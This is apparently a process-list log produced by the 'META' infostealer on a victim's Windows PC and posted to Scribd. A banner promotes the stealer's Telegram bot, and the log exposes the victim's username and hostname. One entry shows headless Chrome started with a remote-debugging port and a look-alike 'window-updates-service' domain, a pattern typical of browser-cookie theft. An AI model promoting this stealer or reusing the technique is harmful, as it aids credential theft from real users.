Scribd
Upload
74 views14 pages

Process List

The document lists process IDs, names, and command lines running on the system. There are many svchost.exe and other common Windows processes as well as browsers like Chrome and Edge.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
74 views14 pages

Process List

The document lists process IDs, names, and command lines running on the system. There are many svchost.exe and other common Windows processes as well as browsers like Chrome and Edge.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 14

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 896, Name: csrss.exe, CommandLine:


===============
ID: 1120, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 1272, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1368, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 6424, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
WspService
===============
ID: 5280, Name: ETDCtrl.exe, CommandLine: C:\Windows\system32\ETDCtrl.exe
===============
ID: 432, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 7292, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
BthAppGroup -p -s BluetoothUserService
===============
ID: 7296, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 7520, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 7820, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 8016, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 7172, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7732, Name: igfxEMN.exe, CommandLine: "C:\Windows\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_efb119a73d6b56f6\igfxEMN.exe"
===============
ID: 4988, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8692, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -admin
===============
ID: 8660, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8140, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 9452, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9644, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 9952, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10740, Name: lmgrd.exe, CommandLine: lmgrd.exe -z -c License.lic
===============
ID: 4864, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5532, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 3824, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -background
===============
ID: 11120, Name: adskflex.exe, CommandLine: adskflex.exe -T DESKTOP-S8Q13OL 11.18 -
1 -c ";License.lic;" -lmgrd_port 6978 -srv
uocafxNp7b0QtGj0sMJOOwFWCRIpkavm2StWMdgYsJy1EJlYAdCwgEfrieAmDuq --lmgrd_start
6440130c -vdrestart 0
===============
ID: 11132, Name: EPPCCMON.EXE, CommandLine: "C:\Program Files (x86)\EPSON Software\
Epson Printer Connection Checker\EPPCCMON.EXE"
===============
ID: 10408, Name: splwow64.exe, CommandLine: C:\Windows\splwow64.exe 8192
===============
ID: 11212, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000000" /M "L3150 Series"
===============
ID: 524, Name: WINWORD.EXE, CommandLine: "C:\Program Files\Microsoft Office\Root\
Office16\WINWORD.EXE" -Embedding
===============
ID: 9256, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000003" /M "L3150 Series"
===============
ID: 9760, Name: acrotray.exe, CommandLine: "C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\AcroTray.exe"
===============
ID: 11400, Name: ai.exe, CommandLine: "C:\Program Files\Microsoft Office\root\vfs\
ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "6C44CBDB-D1C9-4906-BEDB-
6CAF3F34CDDF" "5D05B1A0-E313-42DF-B3B7-D0F1D358CADA" "524"
===============
ID: 11912, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000002" /M "L3050 Series"
===============
ID: 11956, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000004" /M "L3050 Series"
===============
ID: 11988, Name: utweb.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\uTorrent Web\utweb.exe" /MINIMIZED
===============
ID: 12216, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
===============
ID: 12240, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1
--annotation=channel= --annotation=chromium-version=112.0.5615.121 "--
annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --
annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --
annotation=ver=112.0.1722.48 --initial-client-
data=0x104,0x108,0x10c,0xe0,0x118,0x7ffeb29335f0,0x7ffeb2933600,0x7ffeb2933610
===============
ID: 11556, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=2056 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:2
===============
ID: 11252, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2304 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:3
===============
ID: 10228, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2492 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:8
===============
ID: 12544, Name: Cortana.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbwe\Cortana.exe" -
ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
===============
ID: 13192, Name: CCXProcess.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 13212, Name: node.exe, CommandLine: "C:\Program Files\Adobe\Adobe Creative
Cloud Experience\libs\node.exe" "C:\Program Files\Adobe\Adobe Creative Cloud
Experience\js\main.js"
===============
ID: 13304, Name: EEventManager.exe, CommandLine: "C:\Program Files (x86)\EPSON
Software\Event Manager\EEventManager.exe"
===============
ID: 12552, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13388, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
AarSvcGroup -p -s AarSvc
===============
ID: 13740, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 13912, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
13212 C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 13544, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe"
===============
ID: 13628, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x100,0x104,0x108,0xdc,0x10c,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
ID: 12948, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1704 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:2
===============
ID: 12916, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2128 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 12868, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2320 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 10276, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 9508, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9488, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 14240, Name: CalculatorApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.WindowsCalculator_11.2210.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe" -
ServerName:App.AppXjvs2nbwryyqjz1h8d8v70f70g3rgdcyb.mca
===============
ID: 13624, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 14660, Name: SettingSyncHost.exe, CommandLine: C:\Windows\system32\
SettingSyncHost.exe -Embedding
===============
ID: 14812, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=60786734 --mojo-
platform-channel-handle=6564 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 15076, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7884 --
field-trial-handle=1884,i,1119834537848833595,4337284666919190545,131072
/prefetch:8
===============
ID: 15352, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 2312, Name: SystemSettings.exe, CommandLine: "C:\Windows\ImmersiveControlPanel\
SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
===============
ID: 3520, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7844, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222
http://www.google.com.983259571923150.window-updates-service.com
===============
ID: 8012, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
ID: 9200, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl
--headless --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-
angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:2
===============
ID: 8300, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-
angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-
handle=1596 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:8
===============
ID: 14820, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --headless --lang=en-GB --first-renderer-
process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases
--disable-gpu-compositing --lang=en-GB --device-scale-factor=1.25 --num-raster-
threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --time-
ticks-at-unix-epoch=-1681920756215069 --launch-time-ticks=99541493 --mojo-platform-
channel-handle=2132 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:1
===============
ID: 2428, Name: Creative Cloud.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
===============
ID: 10404, Name: Adobe Desktop Service.exe, CommandLine: "C:\Program Files (x86)\
Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe" --
onOSstartup=true --showwindow=false --waitForRegistration=true
===============
ID: 3524, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle
--locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\
locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT SOIL TESTING\
AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\
CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=2364 /prefetch:8
===============
ID: 4004, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-
handle=2588 /prefetch:1
===============
ID: 15004, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteCoreExt=NGLWrapper --
remoteHelper=CCH_NGLW
===============
ID: 4032, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
ID: 8916, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6272, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteApplet=UPI_BL --
remoteAppletInstanceID=4FA2D6C0-40BE-4D3C-8AA7-9B97B479E8D0 --remoteHelper=CCH_UPI
===============
ID: 6508, Name: CoreSync.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Sync\CoreSync\CoreSync.exe"
===============
ID: 15700, Name: CCLibrary.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\CCLibrary.exe"
===============
ID: 15752, Name: node.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\libs\node.exe" "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\js\server.js"
===============
ID: 772, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-
channel-handle=3364 /prefetch:1
===============
ID: 11672, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=4304 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:8
===============
ID: 3780, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=5420 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:8
===============
ID: 12996, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=proxy_resolver --no-sandbox --use-angle=swiftshader-webgl --
use-gl=angle --locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop
Common\CEF\locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT
10.0.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81
Safari/537.36 CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT
SOIL TESTING\AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\
Local\Temp\CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=3980
/prefetch:8
===============
ID: 1572, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 14076, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 16348, Name: SDXHelper.exe, CommandLine: "C:\Program Files\Microsoft Office\
Root\Office16\SDXHelper.exe" -Embedding
===============
ID: 13396, Name: Video.UI.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.ZuneVideo_10.22091.10031.0_x64__8wekyb3d8bbwe\Video.UI.exe" -
ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
===============
ID: 4884, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 15504, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2022.30120.12007.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 2292, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 3212, Name: BridgeCommunication.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_f0454c515430e99a\x64\
BridgeCommunication.exe" 7d81deda-1f1e-4cc9-b3c7-66344ba72df6 Global\46a5ff4c-b72f-
4222-8766-437accf142e1 1820
===============
ID: 14908, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7983848170 --mojo-
platform-channel-handle=2920 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 3924, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7988413282 --mojo-
platform-channel-handle=5480 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 9708, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7988903262 --mojo-
platform-channel-handle=8292 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10272, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=7991790787 --mojo-
platform-channel-handle=7396 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 8556, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8300793031 --mojo-
platform-channel-handle=5988 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 7416, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8519766493 --mojo-
platform-channel-handle=10636 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10252, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8535202180 --mojo-
platform-channel-handle=11112 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 1188, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8535782325 --mojo-
platform-channel-handle=8732 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 11764, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8538304491 --mojo-
platform-channel-handle=9104 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 10172, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=8548106957 --mojo-
platform-channel-handle=10956 --field-trial-
handle=1884,i,1119834537848833595,4337284666919190545,131072 /prefetch:1
===============
ID: 3080, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84
